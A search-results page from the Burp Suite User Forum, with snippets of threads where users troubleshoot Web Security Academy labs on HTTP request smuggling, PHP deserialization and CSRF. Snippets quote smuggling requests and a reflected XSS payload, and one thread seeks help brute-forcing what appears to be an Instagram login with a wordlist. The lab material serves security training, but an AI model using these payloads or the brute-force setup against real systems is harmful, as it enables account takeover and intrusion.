Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Found 50 posts in 45 threads

Lab : Modifying serialized data types. Bug Decoder?

of the video I get this error : PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 I understand that encoded url = %65%33%4d%36%4f%44%6f%69%64%58%4e%6c%63%6d%35%68%62%57%55%69%4f%33%4d%36%4d%54%4d%36%49%6d%46% 6b%62%57%6c%75%61%58%4e%30%63%6d%46%30%62%33%49%69%4f%33%4d%36%4d%54%49%36%49%6d%46%6a%59%32%56%7a%63%

Last updated: Mar 15, 2021 01:48PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

No Host header in https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass

cookie: session=uh7z8Bd1CaBOY98M1UQs5vtO2syzKWRL cookie: _lab=46% u=1 te: trailers content-type: application/x-www-form-urlencoded Thanks for the reply and sorry for bothering.

Last updated: Jul 08, 2024 02:17PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

Missed SQL Injection

identify it with as the following: sqlmap identified the following injection point(s) with a total of 46 =0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded JSESSIONID=29DB5859; username=username; password=password payeeId=abc The website is created for testing web scanner applications, please feel free to use it for that purpose.

Last updated: Nov 23, 2021 08:40AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Lab: Modifying serialized data types - Debug dumps tokens

y6woegwraq17bq0drumffn0nfujbitmw, p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7

Last updated: Aug 20, 2021 02:26PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Lab doesn't seem to be working for me, even when I follow the solution. Getting timeout errors. HTTP/1.1 Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Last updated: Jan 30, 2020 10:00AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

HTTP Request Smuggling

Located at https://portswigger.net/web-security/request-smuggling/finding uri The request for "Confirming responses" is given as "POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded server was given as "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded should be like this: "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 01:54PM UTC | 1 Agent replies | 0 Community replies | How do I?

HTTP Request Smuggling

(It accepts limits between 10-15, I get an invalid request error for values ​​less than 9 and 9.).The portwigger: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 06:44PM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab 1 Directory traversal(File path traversal, simple case)

3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal

Last updated: May 06, 2022 09:39AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

The solution for the challenge provided is: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0

Last updated: Dec 08, 2022 07:47AM UTC | 6 Agent replies | 6 Community replies | How do I?

invisible proxy

Here are instruction for "Windows":https://help.oclc.org/Library_Management/EZproxy/Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www.2daygeek.com/how-to-add-additional-ip-secondary-ip-in-ubuntu-debian-system/

Last updated: Jun 05, 2019 04:40PM UTC | 3 Agent replies | 2 Community replies | How do I?

Solution not functional: "Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses"

Hi Ben, Thank you so much for checking. I tried the same solution with a colleague and it worked for him as well so it must be something unique This lead me to reset my Burp user settings and that solved the issue for me. HTTP/1.1 Host: 0a4c00f10450f67f802cd1480095009f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Sep 17, 2024 11:20AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Lab: HTTP request smuggling, basic TE.CL vulnerability

Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 For the host, try leaving out https://.

Last updated: Aug 07, 2024 06:52AM UTC | 8 Agent replies | 13 Community replies | How do I?

Lab Issues: Exploiting HTTP request smuggling to deliver reflected XSS

So the exact same thing should work for the virtual victim, but this is not the case. Exploit: ``` POST / HTTP/1.1 Host: my-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded postId=5 HTTP/1.1 User-Agent: a"/><script>alert(1)</script> Content-Type: application/x-www-form-urlencoded

Last updated: Jan 27, 2022 12:17PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

HTTP smuggling

For example i want to send this request to Confirming TE.CL vulnerabilities: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding : chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 03, 2022 04:04PM UTC | 2 Agent replies | 2 Community replies | How do I?

Request Smuggling - Lab does not work

For instance, in the lab "https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 24, 2023 06:51AM UTC | 4 Agent replies | 4 Community replies | How do I?

Lab: Modifying serialized data types

end up with a "Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line

Setting the right cookie gives the error "PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on username=carlos trick dosen't work for me. Still getting the same error.

answer guide) Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line

answer guide) Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line

Modifying serialized objects" PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 echo "O:4:"User":2

Last updated: Jul 19, 2023 11:43AM UTC | 8 Agent replies | 15 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Good morning, The following request in the provided solution did work for me but I don't understand HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded Thanks in advance for your help. Regards, Luc

Last updated: Aug 17, 2022 02:49PM UTC | 2 Agent replies | 4 Community replies | Burp Extensions

Academy Leaning Material minor mistake on "Finding HTTP request smuggling vulnerabilities" page.

reads as below: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 144 x= 0 I believe '7c' is a mistake for the chunk size as it should actually

Last updated: Oct 08, 2021 12:52AM UTC | 0 Agent replies | 0 Community replies | Bug Reports

Lab: HTTP request smuggling, basic TE.CL vulnerability

document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 It is necessary for HTTP1.1.

This part of request is waiting for a second request on backend GET /post? postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 We have response for this request GET /post?postId=9 HTTP/1.1 .... BUT!

Last updated: Sep 26, 2024 05:26PM UTC | 2 Agent replies | 1 Community replies | How do I?

Exploiting PHP deserialization with a pre-built gadget chain - getting error

Symfony Version: 4.3.6 PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Thanks

Last updated: Jun 05, 2021 09:01AM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab Login Not Working

HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jul 10, 2020 08:07AM UTC | 3 Agent replies | 5 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Mar 05, 2021 03:32PM UTC | 1 Agent replies | 2 Community replies | How do I?

HTTP request smuggling, basic TE.CL vulnerability

i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 20, 2020 01:02PM UTC | 1 Agent replies | 1 Community replies | How do I?

Not possible to disable "Update Content-Length"

HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 105 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 02, 2022 02:11PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

Proxy connection closed

when the intercept on it loading for long time and no result POST /index.php/login? 7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84 Connection: close Content-Type: application/x-www-form-urlencoded

Last updated: Feb 17, 2018 08:26AM UTC | 3 Agent replies | 5 Community replies | Bug Reports

why there is an empty line after Content-Length header in http smuggle attacks?

for example : POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 21, 2022 06:13PM UTC | 0 Agent replies | 1 Community replies | How do I?

Advanced Target Scope - Load File

example.com/* test.net/path/here/* www.test.net/* ----------- Would make the following scopes for both http and https: ----------- example\.com .*\.example\.com\/* test\.net\/path\/here\/* www\

Last updated: Mar 30, 2022 09:52AM UTC | 6 Agent replies | 7 Community replies | How do I?

Scanner "X-Forwarded-For dependent response" check alters Content-Type?

I'm seeing behavior from the active scan check for "X-Forwarded-For dependent response" that changes When the scanner sends the request with the added X-Forwarded-For header, it changes the content type Accept-Encoding: gzip, deflate X-CSRFToken: I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6 Content-Type: application/x-www-form-urlencoded Cookie: sessionid=<redacted>; csrftoken=I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6 Connection: close X-Forwarded-For : 127.0.0.1 Notice the change to "Content-Type: application/x-www-form-urlencoded" As this app

Last updated: Jun 01, 2016 08:25AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Issues with Burp Suite Enterprise Edition deployed on GKE

C) Since log disk space has been 46 GB I need to delete that. How I can do that ? E) Can you please let me know the below debug settings and how to use that for debugging ? settings From time to time, the PortSwigger support team may ask you to enable detailed debugging for

Last updated: Nov 22, 2022 05:59PM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Lab - Modifying serialized objects login fuction not working properly?

PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php') in /var/www/index.php on line 1 And I am unable to log in, therefore no request For more details, i pasted the request and response below: REQUEST POST /login HTTP/1.1 is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php&apos;) in /var/www/index.php on line 1</p> </div> </section

Last updated: Oct 24, 2022 03:46PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

PHP deserialization: Signature does not match

receiving this error: PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2

Last updated: Sep 05, 2023 06:14AM UTC | 1 Agent replies | 1 Community replies | How do I?

ca certificate

The URL is http://burp/ - there's no www.

Last updated: Jun 10, 2020 07:32AM UTC | 7 Agent replies | 9 Community replies | Bug Reports

Design new extension - Problem with buildRequest and URL Encode

for(String payload: payloads){ IHttpRequestResponse response = this.callbacks.makeHttpRequest example to look for XSS, is that if you encode the payload in url encode, you can not try to skip filters should submit raw non-encoded payloads to insertion points, and the insertion point has responsibility for script>alert(1)</script> Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded http://127.0.0.1/a.php Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 05, 2018 02:11PM UTC | 6 Agent replies | 6 Community replies | Burp Extensions

HTTP request Smuggling CL.TE LAB

HTTP/1.1 Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net Content-Type: application/x-www-form-urlencoded It is not present the chunk length of the second chunk (smuggled one) Thanks in advance for the support

Last updated: Jan 18, 2023 10:45AM UTC | 2 Agent replies | 3 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Nov 29, 2021 08:07PM UTC | 1 Agent replies | 2 Community replies | How do I?

multiple request headers in burpsuite community edition v2023.7.2

Hi i am facing an error saying duplicate headers in request using turbo intruder for this lab. Cookie: session=8aVCM2qExzt0Y2t1AJ4WhRIKozqAYedJ Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: May 25, 2024 06:30AM UTC | 4 Agent replies | 5 Community replies | How do I?

vulnerable yes or no

POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1 Host: www.---------.com Origin: http://example.com : */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1410 Origin: https://www.--------.com Connection: close Referer: https://www.realself.com

Last updated: Jul 05, 2021 10:20AM UTC | 0 Agent replies | 0 Community replies | How do I?

project file not saved

The timestamp on the main project file is 11:34 The timestamp of the most recent *backup* is 11:46 There are only four backup files 09:36 10:07 10:46 11:46 I'm running Burp on a Windows 10 VM I mention this in case it's relevant, but this is how I've used Burp 1.x for years, successfully.

Last updated: Aug 12, 2019 03:30PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

DOM-based open redirection

/burp-suite-explain-dom-based-open-redirection - https://portswigger.net/support/using-burp-to-test-for-open-redirections - https://owasp.org/www-pdf-archive/OWASP_Appsec_Research_2010_Redirects_XSLJ_by_Sirdarckcat_and_Thornmaker.pdf

Last updated: Sep 10, 2021 09:12AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Need help with password cracking

br X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb X-Instagram-AJAX: 1 Content-Type: application/x-www-form-urlencoded set it up to do a sniper attack then I load rockyou.txt as a payload then i start it and i get this for br X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb X-Instagram-AJAX: 1 Content-Type: application/x-www-form-urlencoded sorry for long post but i have been trying for days to fix this myself and havent got a clue what else

Last updated: Aug 24, 2016 08:37AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: CSRF where token is not tied to user session

Then by intercepting the POST request for change email 3 times, I found that every time new CSRF token https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded noiA2Y1vmFgJq4K7HZTTbGP9U8hi04Aq --------------------------------------------------- I don't know if it's just for

Last updated: Jun 08, 2020 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Bug in Lab

error Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4

Last updated: May 25, 2021 01:32PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab Not Working Properly

Hannah, for my sanity, is this lab still working as expected? HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Sep 22, 2024 11:33PM UTC | 5 Agent replies | 12 Community replies | How do I?

HTTP request

POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 01, 2023 07:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

Create an SSL cert with Certbot for a private collaborator server

I'd like to use Certbot to create a SSL cert for a private collaborator server on my domain. certbot certonly --webroot -w /var/www/bc.mydomain -d bc.mydomain I get: Invalid response from http

Last updated: Jun 07, 2021 08:45AM UTC | 1 Agent replies | 0 Community replies | How do I?

Search deeper